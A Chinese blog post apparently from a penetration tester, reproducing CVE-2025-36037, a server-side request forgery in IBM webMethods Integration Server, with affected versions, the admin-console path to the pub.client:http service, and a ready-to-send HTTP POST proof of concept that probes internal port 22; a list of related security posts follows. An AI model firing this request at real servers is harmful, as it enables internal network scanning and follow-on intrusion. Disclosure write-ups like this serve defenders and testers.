CVE-2025-36037-IBM webMethods 集成服务器请求伪造-漏洞复现

墨言ink2026-01-13 8:33

工作的时候渗透测试了这个系统,找到了N-day但是没有公开的漏洞复现细节,在此分享一下。

IBM webMethods 集成服务器请求伪造漏洞

漏洞概述

IBM webMethods Integration 服务器受到服务器端请求伪造 (SSRF) 的影响。这可能允许经过身份验证的攻击者从系统发送未经授权的请求,潜在地导致网络枚举或促进其他攻击

漏洞地址

https://nvd.nist.gov/vuln/detail/CVE-2025-36037

影响版本

IBM webMethods Integration 10.15

IBM webMethods Integration 11.1

漏洞复现

需要先登入,进入webMethods系统

Packages-Management-WmPublic-Browse services in WmPublic

可以找到很多打包好的服务

测试发现pub.client:http包可以进行SSRF漏洞的利用。

漏洞POC

复制代码 
POST /invoke/pub.client:http HTTP/1.1
HOST:
Cookie:
Content-Type: application/x-www-form-urlencode

url=http://127.0.0.1:22&method=get

利用SSRF探测发现22端口开放。也可以进行DNS外带测试。

相关推荐
m0_738120722 小时前
应急响应——知攻善防蓝队溯源靶机Linux-2详细流程
linux·服务器·网络·安全·web安全·php
能年玲奈喝榴莲牛奶2 小时前
安全服务-渗透测试服务
安全·web安全·网络安全服务
德迅云安全-小潘1 天前
H5安全风险与防护策略:构建可信的移动互联网服务
web安全
bleach-1 天前
buuctf系列解题思路祥讲--[SUCTF 2019]CheckIn1--文件上传以及user.ini的应用
nginx·web安全·网络安全·php
dalerkd2 天前
忙里偷闲叙-谈谈最近两年
网络·安全·web安全
菩提小狗2 天前
Sqlmap双击运行脚本,双击直接打开。
前端·笔记·安全·web安全
菩提小狗2 天前
SQL注入之sqlmap|web安全|渗透测试|网络安全
数据库·sql·web安全
zhengfei6112 天前
【Slack 安全工具箱】—— 多维度一体化安全管理平台
网络·安全·web安全
菩提小狗2 天前
sqlmap输入命令回车自动退出故障排查
笔记·安全·web安全
热门推荐
01GitHub 镜像站点02Labelme从安装到标注:零基础完整指南03网站改了域名,如何查找?04安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)05Linux下V2Ray安装配置指南06【踩坑笔记】50系显卡适配的 PyTorch 安装07Claude Code 2.1.2 升级报错?别折腾了,一行命令搞定082025-04-03 Latex学习1——本地配置Latex + VScode环境09KGG转MP3工具|非KGM文件|解密音频10jdk21下载、安装(Windows、Linux、macOS)